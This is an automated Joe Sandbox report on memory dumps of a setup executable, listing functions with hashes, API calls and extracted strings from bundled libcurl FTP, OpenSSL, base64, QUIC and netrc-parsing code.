Opcode ID: 157382de4443ef8e60d530d92ebcfd94b5b560fcfb783499269a5ddf7c0f0629
Instruction ID: ca05c10963d5fdff0ff24ed572036ece29526d133505319fd7d77c41c27804a5
Opcode Fuzzy Hash: 157382de4443ef8e60d530d92ebcfd94b5b560fcfb783499269a5ddf7c0f0629
Instruction Fuzzy Hash: 49137E706083858FC720EF2AC48062ABBE1BF89714F59892DF9D59B351D771EC45CBA2

Function 00AAE480 Relevance: 91.8, APIs: 25, Strings: 27, Instructions: 803COMMON

Download Yara Rule

Strings

PRET %s, xrefs: 00AAE5FF
%s |%d|%s|%hu|, xrefs: 00AAEF47
[%s] ftp_state_use_port(), opened socket, xrefs: 00AAEAE2
[%s] ftp_state_use_port(), listening on %d, xrefs: 00AAED9D
EPRT, xrefs: 00AAEF42
PRET, xrefs: 00AAE656
failed to resolve the address provided to PORT: %s, xrefs: 00AAE9DD
socket failure: %s, xrefs: 00AAE9D5
STOP, xrefs: 00AAC3C6, 00AAEA55
Failure sending PORT command: %s, xrefs: 00AAEF05
%s %s, xrefs: 00AAEEDC
bind() failed, we ran out of ports, xrefs: 00AAEB15
???, xrefs: 00AAEADC, 00AAEAE1, 00AAED2B, 00AAED31, 00AAED96, 00AAED9C
,%d,%d, xrefs: 00AAEEBF
getsockname() failed: %s, xrefs: 00AAE905, 00AAEC1B
PRET STOR %s, xrefs: 00AAE607
LIST, xrefs: 00AAE5F1
NLST, xrefs: 00AAE5F6, 00AAE5FE
PRET RETR %s, xrefs: 00AAE5D9
REST %d, xrefs: 00AAE4A6
bind(port=%hu) failed: %s, xrefs: 00AAED00
[%s] -> [%s], xrefs: 00AAC2D2, 00AAC3D2, 00AAC596, 00AAE45F, 00AAE4FF, 00AAE56E, 00AAE662, 00AAEA61
RETR_PREQUOTE, xrefs: 00AAE562
PORT, xrefs: 00AAEED7
bind(port=%hu) on non-local address failed: %s, xrefs: 00AAEBC6
Failure sending EPRT command: %s, xrefs: 00AAEF6C
[%s] ftp_state_use_port(), socket bound to port %d, xrefs: 00AAED32

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$REST %d$RETR_PREQUOTE$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
API String ID: 0-1921080684
Opcode ID: 49cffd10ac37f0b7164c08feebee68cb1e4c44ce05516b5d7a899155eb44c781
Instruction ID: 4114181b07d377d9d0cc2ba4c6e0b70d81785d401bbb0e58286061b29b72226a
Opcode Fuzzy Hash: 49cffd10ac37f0b7164c08feebee68cb1e4c44ce05516b5d7a899155eb44c781
Instruction Fuzzy Hash: E852E2B1A04300ABD724DB24DC46B6B77E9AF96704F08482DF889CB2C2E775DD45C7A2

Function 00A6E620 Relevance: 62.3, APIs: 29, Strings: 6, Instructions: 1028COMMON

Download Yara Rule

APIs

fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 00A6E6F1

Strings

0, xrefs: 00A6EBCA
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00A6E68E, 00A6E9AF, 00A6EAF0
(nil), xrefs: 00A6ECCD
.%d, xrefs: 00A6EE0E
-, xrefs: 00A6EC74
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00A6E9AA, 00A6EAEB

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: fputc
String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 1992160199-2555271450
Opcode ID: 3c99607d7fc0b32f858747d060b362168a978972c0e50aa0da5bc23e197d61d4
Instruction ID: bc0d1324fd9c29b3cc0ea19053649de5773fbb1d73bea322211cfbcb1f78fb58
Opcode Fuzzy Hash: 3c99607d7fc0b32f858747d060b362168a978972c0e50aa0da5bc23e197d61d4
Instruction Fuzzy Hash: 6C829A75A083419FDB14CF29D88072BB7F1EFC5764F288A2DE9A997291D730DC058B92

Function 00CF0170 Relevance: 23.2, APIs: 8, Strings: 7, Instructions: 704COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 00CF0374
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 00CF0395
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 00CF049D
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 00CF04E7
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 00CF055F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 00CF057A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00CF0618
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 00CF06E3

Strings

@, xrefs: 00CF0B42
SHA2-384, xrefs: 00CF0B62
SHA2-512, xrefs: 00CF0BA5
SHA1, xrefs: 00CF01F7
MD5, xrefs: 00CF0194
SHA2-224, xrefs: 00CF0238
SHA2-256, xrefs: 00CF0B05

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
API String ID: 1297977491-3776850024
Opcode ID: fbf6dfe28b66fa5a0181ee71ae45104819680c83d06223c845ff8f69eeea40e9
Instruction ID: 90d2cd64fd6687ea246a92c25ee7e87151464fe0bfb9a546d0c02c65970f36dc
Opcode Fuzzy Hash: fbf6dfe28b66fa5a0181ee71ae45104819680c83d06223c845ff8f69eeea40e9
Instruction Fuzzy Hash: 2C52AF719087858BD711CF29C841BABB7E4BFD9344F188A2DF9C892242E774DA44DB93

Function 00C3E270 Relevance: 22.7, APIs: 15, Instructions: 238filestringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 00C3E28D
FindNextFileW.KERNEL32(?,00000000), ref: 00C3E2BB
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 00C3E30A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00C3E3C7
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00C3E3DD
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 00C3E3F8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 00C3E41A
MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00C3E44E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 00C3E563
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00C3E571

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
String ID:
API String ID: 1393009926-0
Opcode ID: f18387b559429014fd5e9e76dd2fa1895f79e2202dc3b53a48b60f914c8cd2a3
Instruction ID: 0444a1ae28b431bf656aaa7048a9613c99999f4b8bfe55ca5ea4a329f8b4c6f6
Opcode Fuzzy Hash: f18387b559429014fd5e9e76dd2fa1895f79e2202dc3b53a48b60f914c8cd2a3
Instruction Fuzzy Hash: F8914731620B419FD3209F39CC85B66BBB5FF85324F184668F8658B6E2E735E950CB60

Function 00BD49F0 Relevance: 16.7, Strings: 13, Instructions: 421COMMON

Download Yara Rule

Strings

%5ld:d=%-2d hl=%ld l=inf %s, xrefs: 00BD4B17
appl [ %d ], xrefs: 00BD4CD1
Error in encoding, xrefs: 00BD5392
(unknown), xrefs: 00BD4E8D
<ASN1 %d>, xrefs: 00BD4C67
cont [ %d ], xrefs: 00BD4CC9
BAD RECURSION DEPTH, xrefs: 00BD4A13
prim: , xrefs: 00BD4B37
length is greater than %ld, xrefs: 00BD53BA
cons: , xrefs: 00BD4B09, 00BD4B32, 00BD4B3F
%-18s, xrefs: 00BD4D01
%5ld:d=%-2d hl=%ld l=%4ld %s, xrefs: 00BD4B4D
priv [ %d ] , xrefs: 00BD4C3F

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: %-18s$%5ld:d=%-2d hl=%ld l=%4ld %s$%5ld:d=%-2d hl=%ld l=inf %s$(unknown)$<ASN1 %d>$BAD RECURSION DEPTH$Error in encoding$appl [ %d ]$cons: $cont [ %d ]$length is greater than %ld$prim: $priv [ %d ]
API String ID: 0-2568808753
Opcode ID: 3fd3e8b4fd1a6999b70ba494e44c1533b3f6ff655be1278d8272e6e962f2add1
Instruction ID: 71aa196f1c5eac7c1bea58716356ac5cba8296d3ef44c346ed5e1a1c4eb32857
Opcode Fuzzy Hash: 3fd3e8b4fd1a6999b70ba494e44c1533b3f6ff655be1278d8272e6e962f2add1
Instruction Fuzzy Hash: 38E1B071608305ABD720AF54D882B2FF7E5EF84744F0448AEFA8997352F771E8009B86

Function 00DD0460 Relevance: 12.0, APIs: 5, Strings: 2, Instructions: 1488COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00DD06A3

Strings

, xrefs: 00DD16D8
, xrefs: 00DD1813

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: $
API String ID: 3510742995-227171996
Opcode ID: d8c252e8d7ad18d203f1d67cb4ab76ec2f4923b33d5ca8497cb455f00eb37043
Instruction ID: 3e0dba9ef105b6fa5cc9d4d010da1994fe7a6e6a527f2106102b4588bc11fa9a
Opcode Fuzzy Hash: d8c252e8d7ad18d203f1d67cb4ab76ec2f4923b33d5ca8497cb455f00eb37043
Instruction Fuzzy Hash: 03D29E72A087559FC724CF28C88066AFBE1EFC4304F198A2EE9D997351D770E945CB92

Function 00CA87D0 Relevance: 11.1, APIs: 6, Strings: 1, Instructions: 565COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00CA8A66
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00CA8A88
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 00CA8B45
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00CA8B59

Strings

providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 00CA8A42, 00CA8F13

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
API String ID: 1297977491-3184136495
Opcode ID: e6212a8b2bb6d8b81df7b64d5961a633aeb7072c8feb07fedf524cfd352745d5
Instruction ID: 0a1d59919ef3de6920be548c5aa350bda422753212a72eb1a164a78f079d0b31
Opcode Fuzzy Hash: e6212a8b2bb6d8b81df7b64d5961a633aeb7072c8feb07fedf524cfd352745d5
Instruction Fuzzy Hash: 4E22D2719087429FD711CF24C881BABB7E5FF96348F044A1DF8A597242DB30EA48CB62

Function 00DE4780 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 00DE47A3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DE47C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00DE4800
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DE4D16

Strings

xn--, xrefs: 00DE49D3
H, xrefs: 00DE4A88

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _strdupmemcpystrchrstrlen
String ID: H$xn--
API String ID: 1602650251-4022323365
Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction ID: 2f5803b55a44e4d18f12baf444a8a9fc90686bd1acaeedda9bd7ca7c27d36f46
Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction Fuzzy Hash: 90E139716087958FD718EE2AD8C072AB7D2ABC4314F188A3DD9D687381D774DC0587A6

Function 00D6C050 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 304COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00D6C090
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 00D6C0BE

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 00D6C0D2, 00D6C266
assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 00D6C433
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00D6C0CD, 00D6C26B
crypto/evp/encode.c, xrefs: 00D6C42E

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
API String ID: 3510742995-2458911571
Opcode ID: 25a240eae8cb10270cb024830c413ff362eef8e04ad141e8585ac4ca0959dd25
Instruction ID: 55e25b0e6f5b28bdcd7e7cc9ac11befc0fb3f4640693f43ce9f41b2930506781
Opcode Fuzzy Hash: 25a240eae8cb10270cb024830c413ff362eef8e04ad141e8585ac4ca0959dd25
Instruction Fuzzy Hash: F7C1067561C3958FC715DF28C49073ABBE1AF9A304F0889ADF8D58B382D635E905CB62

Function 00BC2430 Relevance: 8.0, Strings: 4, Instructions: 2966COMMON

Download Yara Rule

Strings

@, xrefs: 00BC4EA7
@, xrefs: 00BC4DB4
@, xrefs: 00BC4F5D
ssl/quic/quic_txp.c, xrefs: 00BC2A29, 00BC3096, 00BC3477, 00BC357D, 00BC3FDE, 00BC4101

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID: @$@$@$ssl/quic/quic_txp.c
API String ID: 0-600063881
Opcode ID: 40e0fb81201cad48751bb300bf5aebc4cf765fbd579c8f33c3eeba3015771f25
Instruction ID: 67e707f86fc5639b5f12f956530d4bc5a107d13bbc751745c662d0af02ad4c6c
Opcode Fuzzy Hash: 40e0fb81201cad48751bb300bf5aebc4cf765fbd579c8f33c3eeba3015771f25
Instruction Fuzzy Hash: 2853B0716083418FD724CF28C891FAAB7E1FF84314F1889ADE89997391E771E945CB92

Function 00AC6210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON

Download Yara Rule

Strings

default, xrefs: 00AC6471
machine, xrefs: 00AC6456, 00AC6656
login, xrefs: 00AC64FF
macdef, xrefs: 00AC643B
password, xrefs: 00AC65C6
